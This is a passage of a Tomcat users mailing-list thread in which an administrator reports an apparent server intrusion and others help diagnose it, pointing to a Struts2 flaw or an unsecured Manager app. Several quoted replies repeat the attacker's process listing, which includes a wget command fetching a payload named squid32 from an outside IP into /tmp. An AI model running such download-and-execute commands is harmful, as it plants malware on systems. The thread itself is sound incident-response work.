> >>> To unsubscribe, e-mail: users-unsubscribe@tomcat.apache.org
> >>> For additional commands, e-mail: users-help@tomcat.apache.org
> >>>
> >>>
> >>
>
>
> ---------------------------------------------------------------------
> To unsubscribe, e-mail: users-unsubscribe@tomcat.apache.org
> For additional commands, e-mail: users-help@tomcat.apache.org
>
>
Re: Regarding i think an intrusion
Posted by Felix Schumacher <fe...@internetallee.de>.
On 30. April 2014 17:35:52 MESZ, Leonardo Santagostini <ls...@gmail.com> wrote:
>Hello list,
>
>well my homework is done
>
>Here are the links:
>
>setenv.sh: http://pastebin.com/EN1mXDFi
>catalina.sh: http://pastebin.com/1vRVLbSm
>web.xml: http://pastebin.com/BqEfiXXm
>server.xml: http://pastebin.com/wfzE8bYU
>logging.properties: http://pastebin.com/Qurk8sLU
>catalina.properties: http://pastebin.com/jkfY1ZRQ
>tree + logsfiles: http://pastebin.com/j3tip4ij
>From the logfiles it looks like you have struts2 applications. It might be that you are hit by a security problem within struts2 ( Konstantin forwarded a warning a few days ago http://tomcat.10.x6.nabble.com/Fwd-ANN-Struts-2-up-to-2-3-16-1-Zero-Day-Exploit-Mitigation-security-critical-td5016578.html ).
>
>Note that logsfiles, are not the logfiles itsef but only a ls -lah
>(just
>for you to see the logsizes)
>
>A little more about the infraestructure i've mounted ill do some ascii
>art.
>
>
>internet ---> FW -->nat-->Haproxy (1)-->Apache(2)--> mod_jk
>(3)-->Haproxy(4)--> Tomcat7(5) --> haproxy(6) --Tomcat(7)
That seems a bit too complex. In my eyes you need no haproxy between httpd and tomcat when you use mod_jk.
Regards
Felix
>
>
>Apache(2) is serving static content so haproxy(1) at the first level
>does
>http round robin balancing
>Apache(2) connects to tomcat(5) through haproxy(4) (using L4
>connection)
>using mod_jk(3)
>Tomcat(5) are the main app server (the ones gets intruded) who uses
>tomcat(7) (solr service) using haproxy(6) using L4 connection.
>
>Versions:
>
>Apache: 2.2.17
>mod_jk: 1.2.31
>haproxy: 1.4.22
>Tomcat: 7.0.53
>Java: 1.6.0.41
>
>[root@arcbaappvrt05 tomcat]# /usr/java/default/bin/java -version
>java version "1.6.0_41"
>Java(TM) SE Runtime Environment (build 1.6.0_41-b02)
>Java HotSpot(TM) 64-Bit Server VM (build 20.14-b01, mixed mode)
>
>OS: CentOS 5.8 64 bit
>
>[root@arcbaappvrt05 tomcat]# uname -a
>Linux arcbaappvrt05.tic.yellargentina.com 2.6.18-308.el5 #1 SMP Tue Feb
>21
>20:06:06 EST 2012 x86_64 x86_64 x86_64 GNU/Linux
>[root@arcbaappvrt05 tomcat]# cat /etc/redhat-release
>CentOS release 5.8 (Final)
>[root@arcbaappvrt05 tomcat]#
>
>For now i havent see that the squid process whas launched so i couldnt
>do a
>dump
>
>Letme know if you need more information.
>
>BTW, pastebin links will work for one week.
>
>Kind regards, yours
>
>
>
>
>Saludos.-
>Leonardo Santagostini
>
><http://ar.linkedin.com/in/santagostini>
>
>
>
>
>
>2014-04-30 11:09 GMT-03:00 Leonardo Santagostini
><ls...@gmail.com>:
>
>> Ok, i will do the following:
>>
>> 1) thread dump of running tomcat instance
>> 2) Pastebin the running tomcat config
>>
>> I think at mid day will have all the info.
>>
>> Thanks all for replying me and all the responses.
>>
>> Regards, Leonardo
>>
>> Saludos.-
>> Leonardo Santagostini
>>
>> <http://ar.linkedin.com/in/santagostini>
>>
>>
>>
>>
>>
>> 2014-04-30 10:55 GMT-03:00 Christopher Schultz <
>> chris@christopherschultz.net>:
>>
>> -----BEGIN PGP SIGNED MESSAGE-----
>>> Hash: SHA256
>>>
>>> Konstantin,
>>>
>>> On 4/29/14, 4:54 PM, Konstantin Kolinko wrote:
>>> > 2014-04-30 0:41 GMT+04:00 Leonardo Santagostini
>>> > <ls...@gmail.com>:
>>> >> Hello Dan,
>>> >>
>>> >> Nop, the attacker is executing locally the following
>>> >>
>>> >> tomcat 8882 1 0 Apr27 ? 00:00:00 sh /tmp/4.sh
>>> >> tomcat 8893 8882 0 Apr27 ? 00:00:00 wget
>>> >> http://218.199.102.59/.xy/squid32 -O /tmp/squid
>>> >>
>>> >> And the launch squid who tries to connect via ssh to varoius
>>> >> places.
>>> >>
>>> >> Right now its time to leave the office, but in a few hours i will
>>> >> paste in pastebin access logs, config files, wherever you tell
>>> >> me.
>>> >>
>>> >> This is my pstree
>>> >>
>>> >> [root@arcbaappvrt05 apache-tomcat-7.0.53]# pstree init─┬─atd
>>> >> ├─java─┬─sh───wget │ └─263*[{java}]
>>> >
>>> > sh launched by tomcat's java?
>>>
>>> Yes: please verify that it's the JVM running Tomcat, and not just
>any
>>> JVM process.
>>>
>>> > Take a thread dump:
>>> >
>>>
>https://wiki.apache.org/tomcat/HowTo#How_do_I_obtain_a_thread_dump_of_my_running_webapp_.3F
>>> >
>>> > It shall show what is stacktrace in thread that launched external
>>> > process.
>>>
>>> +1
>>>
>>> The only things that ship with Tomcat that call Process.exec() are
>the
>>> CGI servlet and SSI, both of which are disabled by default. So,
>either
>>> you have an insecure CGI/SSI configuration, your web application has
>a
>>> vulnerability, or you have deployed something like the Manager
>>> application and improperly-secured it.
>>>
>>> A classic example of such an intrusion might be that someone got a
>>> foothold elsewhere into your network, and the Manager web
>application
>>> is not properly secured with a password, etc.
>>>
>>> - -chris
>>> -----BEGIN PGP SIGNATURE-----
>>> Version: GnuPG v1
>>> Comment: GPGTools - http://gpgtools.org
>>> Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/
>>>
>>> iQIcBAEBCAAGBQJTYQDeAAoJEBzwKT+lPKRYaPoQAKpqrj5bWfGXpEEHMINjw1Qp
>>> +qqdL7O61QLmWoA1neUbyM7A2s8mY3lRdcZwDw2IG33xoeLuFaavhFlDGr2Txer4
>>> HiGDR8ixOv2mY9J9bMC889hih4N5dz0fYlw/b5SouUVz2aCbeUhYK+6lsBXRy2fC
>>> D+UoNOiQF6uX2ZlqJYZTAvgzC2t/SGGnTW3GLx+3buRxs4JlUjJ8RWEOZtjZLQ5o
>>> gUZ+UF6K/7dewYr6TjDmwc1C226dJNaliymQu2qbVgpRvoJ+baRgpeoyt6hzhIxr
>>> BA8gjKY5xOH6QrpSX2tdU8RNCRVLIgSmbp9Mj+Hovdw4kkDMLQvS3osuGq5HaEwS
>>> ZMltWiTef+K2yZyO3L8xrsJaRbox1j8Pg38ea22GRE48kpNagoQdCM2+uMCVN8Yj
>>> UFjUrcpMu0FX06dy8azbFDRZMv5lD8nmwgE624nT+gZfFaxGHNLa9dRpJWHZgvTb
>>> TSESKHv2lq9F4qc7bxoVrRDa8hnNLHk2luU9qot5JWXnb5en0fFKMZopwXwXYA4W
>>> WgGA0Cfy4gALkA4/CCqrsn6Z+EqIxXNdCn74CeeCh5fV28+0Zpuj7G1adtJUkCQ7
>>> 87Cq6kXwHx4hfp//6vQhnZIGWYeKDOIgqbKuaP27pIcE1QCag5MOlmVT4pQjpT12
>>> lvJcfOhzHLwo07Pv+y3J
>>> =EiX9
>>> -----END PGP SIGNATURE-----
>>>
>>>
>---------------------------------------------------------------------
>>> To unsubscribe, e-mail: users-unsubscribe@tomcat.apache.org
>>> For additional commands, e-mail: users-help@tomcat.apache.org
>>>
>>>
>>
---------------------------------------------------------------------
To unsubscribe, e-mail: users-unsubscribe@tomcat.apache.org
For additional commands, e-mail: users-help@tomcat.apache.org
RE: Regarding i think an intrusion
Posted by Martin Gainty <mg...@hotmail.com>.
> Date: Wed, 30 Apr 2014 12:35:52 -0300
> Subject: Re: Regarding i think an intrusion
> From: lsantagostini@gmail.com
> To: users@tomcat.apache.org
>
> Hello list,
>
> well my homework is done
>
> Here are the links:
>
> setenv.sh: http://pastebin.com/EN1mXDFi
> catalina.sh: http://pastebin.com/1vRVLbSm
> web.xml: http://pastebin.com/BqEfiXXm
> server.xml: http://pastebin.com/wfzE8bYU
> logging.properties: http://pastebin.com/Qurk8sLU
> catalina.properties: http://pastebin.com/jkfY1ZRQ
> tree + logsfiles: http://pastebin.com/j3tip4ij
MG>Por favor, pegue el contenido de los siguientes archivos de registros en Pastebin y enviarnos link:
-rw-rw-r-- 1 tomcat tomcat 5.0K Apr 30 05:38 localhost.2014-04-30.log-rw-rw-r-- 1 tomcat tomcat 5.4M Apr 30 12:19 localhost_access_log.2014-04-30.txt
-rw-rw-r-- 1 tomcat tomcat 0 Apr 30 05:38 manager.2014-04-30.log
-rw-rw-r-- 1 tomcat tomcat 3.7M Apr 30 12:19 PDI_access_log.2014-04-30.txt-rw-rw-r-- 1 tomcat tomcat 43M Apr 30 12:18 portal-ht.log-rw-rw-r-- 1 tomcat tomcat 583K Apr 30 10:09 portal-mh.log-rw-rw-r-- 1 tomcat tomcat 58M Apr 30 12:19 portal-pdi.log-rw-rw-r-- 1 tomcat tomcat 3.5M Apr 30 12:18 portal-rt.log
-rw-rw-r-- 1 tomcat tomcat 3.6M Apr 30 12:18 probe.log
-rw-rw-r-- 1 tomcat tomcat 591K Apr 30 12:18 RT_access_log.2014-04-30.txt
MG>Saludos Cordiales desde EEUU
>
> Note that logsfiles, are not the logfiles itsef but only a ls -lah (just
> for you to see the logsizes)
>
> A little more about the infraestructure i've mounted ill do some ascii art.
>
>
> internet ---> FW -->nat-->Haproxy (1)-->Apache(2)--> mod_jk
> (3)-->Haproxy(4)--> Tomcat7(5) --> haproxy(6) --Tomcat(7)
>
>
> Apache(2) is serving static content so haproxy(1) at the first level does
> http round robin balancing
> Apache(2) connects to tomcat(5) through haproxy(4) (using L4 connection)
> using mod_jk(3)
> Tomcat(5) are the main app server (the ones gets intruded) who uses
> tomcat(7) (solr service) using haproxy(6) using L4 connection.
>
> Versions:
>
> Apache: 2.2.17
> mod_jk: 1.2.31
> haproxy: 1.4.22
> Tomcat: 7.0.53
> Java: 1.6.0.41
>
> [root@arcbaappvrt05 tomcat]# /usr/java/default/bin/java -version
> java version "1.6.0_41"
> Java(TM) SE Runtime Environment (build 1.6.0_41-b02)
> Java HotSpot(TM) 64-Bit Server VM (build 20.14-b01, mixed mode)
>
> OS: CentOS 5.8 64 bit
>
> [root@arcbaappvrt05 tomcat]# uname -a
> Linux arcbaappvrt05.tic.yellargentina.com 2.6.18-308.el5 #1 SMP Tue Feb 21
> 20:06:06 EST 2012 x86_64 x86_64 x86_64 GNU/Linux
> [root@arcbaappvrt05 tomcat]# cat /etc/redhat-release
> CentOS release 5.8 (Final)
> [root@arcbaappvrt05 tomcat]#
>
> For now i havent see that the squid process whas launched so i couldnt do a
> dump
>
> Letme know if you need more information.
>
> BTW, pastebin links will work for one week.
>
> Kind regards, yours
>
>
>
>
> Saludos.-
> Leonardo Santagostini
>
> <http://ar.linkedin.com/in/santagostini>
>
>
>
>
>
> 2014-04-30 11:09 GMT-03:00 Leonardo Santagostini <ls...@gmail.com>:
>
> > Ok, i will do the following:
> >
> > 1) thread dump of running tomcat instance
> > 2) Pastebin the running tomcat config
> >
> > I think at mid day will have all the info.
> >
> > Thanks all for replying me and all the responses.
> >
> > Regards, Leonardo
> >
> > Saludos.-
> > Leonardo Santagostini
> >
> > <http://ar.linkedin.com/in/santagostini>
> >
> >
> >
> >
> >
> > 2014-04-30 10:55 GMT-03:00 Christopher Schultz <
> > chris@christopherschultz.net>:
> >
> > -----BEGIN PGP SIGNED MESSAGE-----
> >> Hash: SHA256
> >>
> >> Konstantin,
> >>
> >> On 4/29/14, 4:54 PM, Konstantin Kolinko wrote:
> >> > 2014-04-30 0:41 GMT+04:00 Leonardo Santagostini
> >> > <ls...@gmail.com>:
> >> >> Hello Dan,
> >> >>
> >> >> Nop, the attacker is executing locally the following
> >> >>
> >> >> tomcat 8882 1 0 Apr27 ? 00:00:00 sh /tmp/4.sh
> >> >> tomcat 8893 8882 0 Apr27 ? 00:00:00 wget
> >> >> http://218.199.102.59/.xy/squid32 -O /tmp/squid
> >> >>
> >> >> And the launch squid who tries to connect via ssh to varoius
> >> >> places.
> >> >>
> >> >> Right now its time to leave the office, but in a few hours i will
> >> >> paste in pastebin access logs, config files, wherever you tell
> >> >> me.
> >> >>
> >> >> This is my pstree
> >> >>
> >> >> [root@arcbaappvrt05 apache-tomcat-7.0.53]# pstree init─┬─atd
> >> >> ├─java─┬─sh───wget │ └─263*[{java}]
> >> >
> >> > sh launched by tomcat's java?
> >>
> >> Yes: please verify that it's the JVM running Tomcat, and not just any
> >> JVM process.
> >>
> >> > Take a thread dump:
> >> >
> >> https://wiki.apache.org/tomcat/HowTo#How_do_I_obtain_a_thread_dump_of_my_running_webapp_.3F
> >> >
> >> > It shall show what is stacktrace in thread that launched external
> >> > process.
> >>
> >> +1
> >>
> >> The only things that ship with Tomcat that call Process.exec() are the
> >> CGI servlet and SSI, both of which are disabled by default. So, either
> >> you have an insecure CGI/SSI configuration, your web application has a
> >> vulnerability, or you have deployed something like the Manager
> >> application and improperly-secured it.
> >>
> >> A classic example of such an intrusion might be that someone got a
> >> foothold elsewhere into your network, and the Manager web application
> >> is not properly secured with a password, etc.
> >>
> >> - -chris
> >> -----BEGIN PGP SIGNATURE-----
> >> Version: GnuPG v1
> >> Comment: GPGTools - http://gpgtools.org
> >> Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/
> >>
> >> iQIcBAEBCAAGBQJTYQDeAAoJEBzwKT+lPKRYaPoQAKpqrj5bWfGXpEEHMINjw1Qp
> >> +qqdL7O61QLmWoA1neUbyM7A2s8mY3lRdcZwDw2IG33xoeLuFaavhFlDGr2Txer4
> >> HiGDR8ixOv2mY9J9bMC889hih4N5dz0fYlw/b5SouUVz2aCbeUhYK+6lsBXRy2fC
> >> D+UoNOiQF6uX2ZlqJYZTAvgzC2t/SGGnTW3GLx+3buRxs4JlUjJ8RWEOZtjZLQ5o
> >> gUZ+UF6K/7dewYr6TjDmwc1C226dJNaliymQu2qbVgpRvoJ+baRgpeoyt6hzhIxr
> >> BA8gjKY5xOH6QrpSX2tdU8RNCRVLIgSmbp9Mj+Hovdw4kkDMLQvS3osuGq5HaEwS
> >> ZMltWiTef+K2yZyO3L8xrsJaRbox1j8Pg38ea22GRE48kpNagoQdCM2+uMCVN8Yj
> >> UFjUrcpMu0FX06dy8azbFDRZMv5lD8nmwgE624nT+gZfFaxGHNLa9dRpJWHZgvTb
> >> TSESKHv2lq9F4qc7bxoVrRDa8hnNLHk2luU9qot5JWXnb5en0fFKMZopwXwXYA4W
> >> WgGA0Cfy4gALkA4/CCqrsn6Z+EqIxXNdCn74CeeCh5fV28+0Zpuj7G1adtJUkCQ7
> >> 87Cq6kXwHx4hfp//6vQhnZIGWYeKDOIgqbKuaP27pIcE1QCag5MOlmVT4pQjpT12
> >> lvJcfOhzHLwo07Pv+y3J
> >> =EiX9
> >> -----END PGP SIGNATURE-----
> >>
> >> ---------------------------------------------------------------------
> >> To unsubscribe, e-mail: users-unsubscribe@tomcat.apache.org
> >> For additional commands, e-mail: users-help@tomcat.apache.org
> >>
> >>
> >
Re: Regarding i think an intrusion
Posted by Christopher Schultz <ch...@christopherschultz.net>.
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
Leonardo,
You need to post a thread dump as well.
- -chris
On 4/30/14, 11:35 AM, Leonardo Santagostini wrote:
> Hello list,
>
> well my homework is done
>
> Here are the links:
>
> setenv.sh: http://pastebin.com/EN1mXDFi catalina.sh:
> http://pastebin.com/1vRVLbSm web.xml: http://pastebin.com/BqEfiXXm
> server.xml: http://pastebin.com/wfzE8bYU logging.properties:
> http://pastebin.com/Qurk8sLU catalina.properties:
> http://pastebin.com/jkfY1ZRQ tree + logsfiles:
> http://pastebin.com/j3tip4ij
>
> Note that logsfiles, are not the logfiles itsef but only a ls -lah
> (just for you to see the logsizes)
>
> A little more about the infraestructure i've mounted ill do some
> ascii art.
>
>
> internet ---> FW -->nat-->Haproxy (1)-->Apache(2)--> mod_jk
> (3)-->Haproxy(4)--> Tomcat7(5) --> haproxy(6) --Tomcat(7)
>
>
> Apache(2) is serving static content so haproxy(1) at the first
> level does http round robin balancing Apache(2) connects to
> tomcat(5) through haproxy(4) (using L4 connection) using mod_jk(3)
> Tomcat(5) are the main app server (the ones gets intruded) who
> uses tomcat(7) (solr service) using haproxy(6) using L4
> connection.
>
> Versions:
>
> Apache: 2.2.17 mod_jk: 1.2.31 haproxy: 1.4.22 Tomcat: 7.0.53 Java:
> 1.6.0.41
>
> [root@arcbaappvrt05 tomcat]# /usr/java/default/bin/java -version
> java version "1.6.0_41" Java(TM) SE Runtime Environment (build
> 1.6.0_41-b02) Java HotSpot(TM) 64-Bit Server VM (build 20.14-b01,
> mixed mode)
>
> OS: CentOS 5.8 64 bit
>
> [root@arcbaappvrt05 tomcat]# uname -a Linux
> arcbaappvrt05.tic.yellargentina.com 2.6.18-308.el5 #1 SMP Tue Feb
> 21 20:06:06 EST 2012 x86_64 x86_64 x86_64 GNU/Linux
> [root@arcbaappvrt05 tomcat]# cat /etc/redhat-release CentOS
> release 5.8 (Final) [root@arcbaappvrt05 tomcat]#
>
> For now i havent see that the squid process whas launched so i
> couldnt do a dump
>
> Letme know if you need more information.
>
> BTW, pastebin links will work for one week.
>
> Kind regards, yours
>
>
>
>
> Saludos.- Leonardo Santagostini
>
> <http://ar.linkedin.com/in/santagostini>
>
>
>
>
>
> 2014-04-30 11:09 GMT-03:00 Leonardo Santagostini
> <ls...@gmail.com>:
>
>> Ok, i will do the following:
>>
>> 1) thread dump of running tomcat instance 2) Pastebin the
>> running tomcat config
>>
>> I think at mid day will have all the info.
>>
>> Thanks all for replying me and all the responses.
>>
>> Regards, Leonardo
>>
>> Saludos.- Leonardo Santagostini
>>
>> <http://ar.linkedin.com/in/santagostini>
>>
>>
>>
>>
>>
>> 2014-04-30 10:55 GMT-03:00 Christopher Schultz <
>> chris@christopherschultz.net>:
>>
>> -----BEGIN PGP SIGNED MESSAGE-----
>>> Hash: SHA256
>>>
>>> Konstantin,
>>>
>>> On 4/29/14, 4:54 PM, Konstantin Kolinko wrote:
>>>> 2014-04-30 0:41 GMT+04:00 Leonardo Santagostini
>>>> <ls...@gmail.com>:
>>>>> Hello Dan,
>>>>>
>>>>> Nop, the attacker is executing locally the following
>>>>>
>>>>> tomcat 8882 1 0 Apr27 ? 00:00:00 sh
>>>>> /tmp/4.sh tomcat 8893 8882 0 Apr27 ? 00:00:00
>>>>> wget http://218.199.102.59/.xy/squid32 -O /tmp/squid
>>>>>
>>>>> And the launch squid who tries to connect via ssh to
>>>>> varoius places.
>>>>>
>>>>> Right now its time to leave the office, but in a few hours
>>>>> i will paste in pastebin access logs, config files,
>>>>> wherever you tell me.
>>>>>
>>>>> This is my pstree
>>>>>
>>>>> [root@arcbaappvrt05 apache-tomcat-7.0.53]# pstree
>>>>> init─┬─atd ├─java─┬─sh───wget │ └─263*[{java}]
>>>>
>>>> sh launched by tomcat's java?
>>>
>>> Yes: please verify that it's the JVM running Tomcat, and not
>>> just any JVM process.
>>>
>>>> Take a thread dump:
>>>>
>>> https://wiki.apache.org/tomcat/HowTo#How_do_I_obtain_a_thread_dump_of_my_running_webapp_.3F
>>>>
>>>>
>>>
>>>
It shall show what is stacktrace in thread that launched external
>>>> process.
>>>
>>> +1
>>>
>>> The only things that ship with Tomcat that call Process.exec()
>>> are the CGI servlet and SSI, both of which are disabled by
>>> default. So, either you have an insecure CGI/SSI
>>> configuration, your web application has a vulnerability, or you
>>> have deployed something like the Manager application and
>>> improperly-secured it.
>>>
>>> A classic example of such an intrusion might be that someone
>>> got a foothold elsewhere into your network, and the Manager
>>> web application is not properly secured with a password, etc.
>>>
>>> - -chris -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
>>> Comment: GPGTools - http://gpgtools.org Comment: Using GnuPG
>>> with Thunderbird - http://www.enigmail.net/
>>>
>>> iQIcBAEBCAAGBQJTYQDeAAoJEBzwKT+lPKRYaPoQAKpqrj5bWfGXpEEHMINjw1Qp
>>>
>>>
>>>
+qqdL7O61QLmWoA1neUbyM7A2s8mY3lRdcZwDw2IG33xoeLuFaavhFlDGr2Txer4
>>> HiGDR8ixOv2mY9J9bMC889hih4N5dz0fYlw/b5SouUVz2aCbeUhYK+6lsBXRy2fC
>>>
>>>
>>>
D+UoNOiQF6uX2ZlqJYZTAvgzC2t/SGGnTW3GLx+3buRxs4JlUjJ8RWEOZtjZLQ5o
>>> gUZ+UF6K/7dewYr6TjDmwc1C226dJNaliymQu2qbVgpRvoJ+baRgpeoyt6hzhIxr
>>>
>>>
>>>
BA8gjKY5xOH6QrpSX2tdU8RNCRVLIgSmbp9Mj+Hovdw4kkDMLQvS3osuGq5HaEwS
>>> ZMltWiTef+K2yZyO3L8xrsJaRbox1j8Pg38ea22GRE48kpNagoQdCM2+uMCVN8Yj
>>>
>>>
>>>
UFjUrcpMu0FX06dy8azbFDRZMv5lD8nmwgE624nT+gZfFaxGHNLa9dRpJWHZgvTb
>>> TSESKHv2lq9F4qc7bxoVrRDa8hnNLHk2luU9qot5JWXnb5en0fFKMZopwXwXYA4W
>>>
>>>
>>>
WgGA0Cfy4gALkA4/CCqrsn6Z+EqIxXNdCn74CeeCh5fV28+0Zpuj7G1adtJUkCQ7
>>> 87Cq6kXwHx4hfp//6vQhnZIGWYeKDOIgqbKuaP27pIcE1QCag5MOlmVT4pQjpT12
>>>
>>>
>>>
lvJcfOhzHLwo07Pv+y3J
>>> =EiX9 -----END PGP SIGNATURE-----
>>>
>>> ---------------------------------------------------------------------
>>>
>>>
>>>
To unsubscribe, e-mail: users-unsubscribe@tomcat.apache.org
>>> For additional commands, e-mail: users-help@tomcat.apache.org
>>>
>>>
>>
>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
Comment: GPGTools - http://gpgtools.org
Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/
iQIcBAEBCAAGBQJTYR5XAAoJEBzwKT+lPKRYJ0UQAMTPdU2ugxOoFKdgq6twIyp8
S2DSQ5qI65fBrBYO09TxrEN+zoFRghvMLMCsrwe7rapW1gU4aO9KqYW+DCaK8O2Z
eDai+s1VrDVCJrrtN/7mJzCBFfKa0aWmcbM2GCQByQrYNH14M1ty2OCYLj53cZgU
XpdGApa/W0LwUFaSGTnRe8+z/J1kL6++AEhjDT2Hm778QNsmil19ShtQvtOIQiyd
Yho5rlgPAEt5/FWzsX0y/Rsa8EkHdg/j3xdwyvhkPeW/4xS00XgGtFaRQHjWr3Wq
AFfRZ75EXtS5pa3PwjRDQzEWva5IiCpRmVaDOBnDPG8bobrXngaVFVYSF9Jhfq72
ej8KgErYw0ov26snZhuq9FFl6/AK9dYrA6L7s1gKt1NOR5QMb821Lmltu/+RwciS
wNuYVQoGxnz0UbJHTIziH8SpPECDCXslsLMEsHTXvGEUFZnvaRBXX7RWHSHweNkR
UsNRM64+WBsQ/jDgP+J5Kbrea0Xsz/PiODDVJygFhv6fbypskNrgE/WXqmBSt6XN
AKHzr+thNbYAkTbtWr0TSZvyQKcqYn/t1DW2iHYQuiWNtUTXT82AV2knnznrpIa9
Yiv2KcAS7Oa4h02uMxu1PvnQgQgNoePtVFfZu+Zcmr2xQ+LKNQB2jRV4z3rUTn+g
TVrGfGXHuu+DuPCSFXUw
=ZgyY
-----END PGP SIGNATURE-----
---------------------------------------------------------------------
To unsubscribe, e-mail: users-unsubscribe@tomcat.apache.org
For additional commands, e-mail: users-help@tomcat.apache.org
Re: Regarding i think an intrusion
Posted by Leonardo Santagostini <ls...@gmail.com>.
Hello list,
well my homework is done
Here are the links:
setenv.sh: http://pastebin.com/EN1mXDFi
catalina.sh: http://pastebin.com/1vRVLbSm
web.xml: http://pastebin.com/BqEfiXXm
server.xml: http://pastebin.com/wfzE8bYU
logging.properties: http://pastebin.com/Qurk8sLU
catalina.properties: http://pastebin.com/jkfY1ZRQ
tree + logsfiles: http://pastebin.com/j3tip4ij
Note that logsfiles, are not the logfiles itsef but only a ls -lah (just
for you to see the logsizes)
A little more about the infraestructure i've mounted ill do some ascii art.
internet ---> FW -->nat-->Haproxy (1)-->Apache(2)--> mod_jk
(3)-->Haproxy(4)--> Tomcat7(5) --> haproxy(6) --Tomcat(7)
Apache(2) is serving static content so haproxy(1) at the first level does
http round robin balancing
Apache(2) connects to tomcat(5) through haproxy(4) (using L4 connection)
using mod_jk(3)
Tomcat(5) are the main app server (the ones gets intruded) who uses
tomcat(7) (solr service) using haproxy(6) using L4 connection.
Versions:
Apache: 2.2.17
mod_jk: 1.2.31
haproxy: 1.4.22
Tomcat: 7.0.53
Java: 1.6.0.41
[root@arcbaappvrt05 tomcat]# /usr/java/default/bin/java -version
java version "1.6.0_41"
Java(TM) SE Runtime Environment (build 1.6.0_41-b02)
Java HotSpot(TM) 64-Bit Server VM (build 20.14-b01, mixed mode)
OS: CentOS 5.8 64 bit
[root@arcbaappvrt05 tomcat]# uname -a
Linux arcbaappvrt05.tic.yellargentina.com 2.6.18-308.el5 #1 SMP Tue Feb 21
20:06:06 EST 2012 x86_64 x86_64 x86_64 GNU/Linux
[root@arcbaappvrt05 tomcat]# cat /etc/redhat-release
CentOS release 5.8 (Final)
[root@arcbaappvrt05 tomcat]#
For now i havent see that the squid process whas launched so i couldnt do a
dump
Letme know if you need more information.
BTW, pastebin links will work for one week.
Kind regards, yours
Saludos.-
Leonardo Santagostini
<http://ar.linkedin.com/in/santagostini>
2014-04-30 11:09 GMT-03:00 Leonardo Santagostini <ls...@gmail.com>:
> Ok, i will do the following:
>
> 1) thread dump of running tomcat instance
> 2) Pastebin the running tomcat config
>
> I think at mid day will have all the info.
>
> Thanks all for replying me and all the responses.
>
> Regards, Leonardo
>
> Saludos.-
> Leonardo Santagostini
>
> <http://ar.linkedin.com/in/santagostini>
>
>
>
>
>
> 2014-04-30 10:55 GMT-03:00 Christopher Schultz <
> chris@christopherschultz.net>:
>
> -----BEGIN PGP SIGNED MESSAGE-----
>> Hash: SHA256
>>
>> Konstantin,
>>
>> On 4/29/14, 4:54 PM, Konstantin Kolinko wrote:
>> > 2014-04-30 0:41 GMT+04:00 Leonardo Santagostini
>> > <ls...@gmail.com>:
>> >> Hello Dan,
>> >>
>> >> Nop, the attacker is executing locally the following
>> >>
>> >> tomcat 8882 1 0 Apr27 ? 00:00:00 sh /tmp/4.sh
>> >> tomcat 8893 8882 0 Apr27 ? 00:00:00 wget
>> >> http://218.199.102.59/.xy/squid32 -O /tmp/squid
>> >>
>> >> And the launch squid who tries to connect via ssh to varoius
>> >> places.
>> >>
>> >> Right now its time to leave the office, but in a few hours i will
>> >> paste in pastebin access logs, config files, wherever you tell
>> >> me.
>> >>
>> >> This is my pstree
>> >>
>> >> [root@arcbaappvrt05 apache-tomcat-7.0.53]# pstree init─┬─atd
>> >> ├─java─┬─sh───wget │ └─263*[{java}]
>> >
>> > sh launched by tomcat's java?
>>
>> Yes: please verify that it's the JVM running Tomcat, and not just any
>> JVM process.
>>
>> > Take a thread dump:
>> >
>> https://wiki.apache.org/tomcat/HowTo#How_do_I_obtain_a_thread_dump_of_my_running_webapp_.3F
>> >
>> > It shall show what is stacktrace in thread that launched external
>> > process.
>>
>> +1
>>
>> The only things that ship with Tomcat that call Process.exec() are the
>> CGI servlet and SSI, both of which are disabled by default. So, either
>> you have an insecure CGI/SSI configuration, your web application has a
>> vulnerability, or you have deployed something like the Manager
>> application and improperly-secured it.
>>
>> A classic example of such an intrusion might be that someone got a
>> foothold elsewhere into your network, and the Manager web application
>> is not properly secured with a password, etc.
>>
>> - -chris
>> -----BEGIN PGP SIGNATURE-----
>> Version: GnuPG v1
>> Comment: GPGTools - http://gpgtools.org
>> Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/
>>
>> iQIcBAEBCAAGBQJTYQDeAAoJEBzwKT+lPKRYaPoQAKpqrj5bWfGXpEEHMINjw1Qp
>> +qqdL7O61QLmWoA1neUbyM7A2s8mY3lRdcZwDw2IG33xoeLuFaavhFlDGr2Txer4
>> HiGDR8ixOv2mY9J9bMC889hih4N5dz0fYlw/b5SouUVz2aCbeUhYK+6lsBXRy2fC
>> D+UoNOiQF6uX2ZlqJYZTAvgzC2t/SGGnTW3GLx+3buRxs4JlUjJ8RWEOZtjZLQ5o
>> gUZ+UF6K/7dewYr6TjDmwc1C226dJNaliymQu2qbVgpRvoJ+baRgpeoyt6hzhIxr
>> BA8gjKY5xOH6QrpSX2tdU8RNCRVLIgSmbp9Mj+Hovdw4kkDMLQvS3osuGq5HaEwS
>> ZMltWiTef+K2yZyO3L8xrsJaRbox1j8Pg38ea22GRE48kpNagoQdCM2+uMCVN8Yj
>> UFjUrcpMu0FX06dy8azbFDRZMv5lD8nmwgE624nT+gZfFaxGHNLa9dRpJWHZgvTb
>> TSESKHv2lq9F4qc7bxoVrRDa8hnNLHk2luU9qot5JWXnb5en0fFKMZopwXwXYA4W
>> WgGA0Cfy4gALkA4/CCqrsn6Z+EqIxXNdCn74CeeCh5fV28+0Zpuj7G1adtJUkCQ7
>> 87Cq6kXwHx4hfp//6vQhnZIGWYeKDOIgqbKuaP27pIcE1QCag5MOlmVT4pQjpT12
>> lvJcfOhzHLwo07Pv+y3J
>> =EiX9
>> -----END PGP SIGNATURE-----
>>
>> ---------------------------------------------------------------------
>> To unsubscribe, e-mail: users-unsubscribe@tomcat.apache.org
>> For additional commands, e-mail: users-help@tomcat.apache.org
>>
>>
>
Re: Regarding i think an intrusion
Posted by Leonardo Santagostini <ls...@gmail.com>.
Ok, i will do the following:
1) thread dump of running tomcat instance
2) Pastebin the running tomcat config
I think at mid day will have all the info.
Thanks all for replying me and all the responses.
Regards, Leonardo
Saludos.-
Leonardo Santagostini
<http://ar.linkedin.com/in/santagostini>
2014-04-30 10:55 GMT-03:00 Christopher Schultz <chris@christopherschultz.net
>:
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA256
>
> Konstantin,
>
